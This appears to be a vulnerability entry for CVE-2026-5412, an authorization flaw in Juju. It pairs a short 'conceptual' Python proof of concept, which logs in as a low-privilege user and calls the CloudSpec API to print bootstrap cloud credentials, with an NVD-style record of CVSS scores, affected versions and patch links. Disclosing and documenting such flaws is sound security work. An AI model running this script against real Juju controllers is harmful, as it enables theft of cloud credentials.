CVE-2026-5412

#!/usr/bin/env python3 """ Conceptual PoC for CVE-2026-5412 Demonstrates credential extraction via CloudSpec API. """ import asyncio from juju import jao from juju.client import client async def get_cloud_spec(controller_addr, username, password): # Connect to the Juju Controller conn = await jao.connect(controller_addr) try: # Login with low-privilege user credentials await conn.login(username, password) # Access the vulnerable Controller facade # The vulnerability allows low-priv users to call this controller_facade = client.ControllerFacade.from_connection(conn) print("[*] Attempting to retrieve CloudSpec...") # Call the CloudSpec method which exposes credentials in vulnerable versions cloud_spec = await controller_facade.CloudSpec() print("[+] Success! Extracted sensitive cloud credentials:") print(f"Cloud Credential: {cloud_spec['cloud_credential']}") print(f"Endpoint: {cloud_spec['endpoint']}") return cloud_spec except Exception as e: print(f"[-] Exploit failed: {e}") finally: await conn.close() if __name__ == "__main__": # Example usage # asyncio.run(get_cloud_spec("wss://10.0.0.1:17070", "low_user", "pass123")) pass

{"cve": {"id": "CVE-2026-5412", "sourceIdentifier": "[email protected]", "published": "2026-04-10T13:16:45.780", "lastModified": "2026-04-30T15:18:26.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privileged user to access sensitive credentials. This issue is resolved in Juju versions 2.9.57 and 3.6.21."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.9.57", "matchCriteriaId": "A2161D9F-0627-4EAF-A6FD-81B9056D31FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6", "versionEndExcluding": "3.6.21", "matchCriteriaId": "2966CF99-1F57-40F3-8EFA-161BF47644DB"}]}]}], "references": [{"url": "https://github.com/juju/juju/pull/22205", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/juju/juju/pull/22206", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/juju/juju/security/advisories/GHSA-w5fq-8965-c969", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}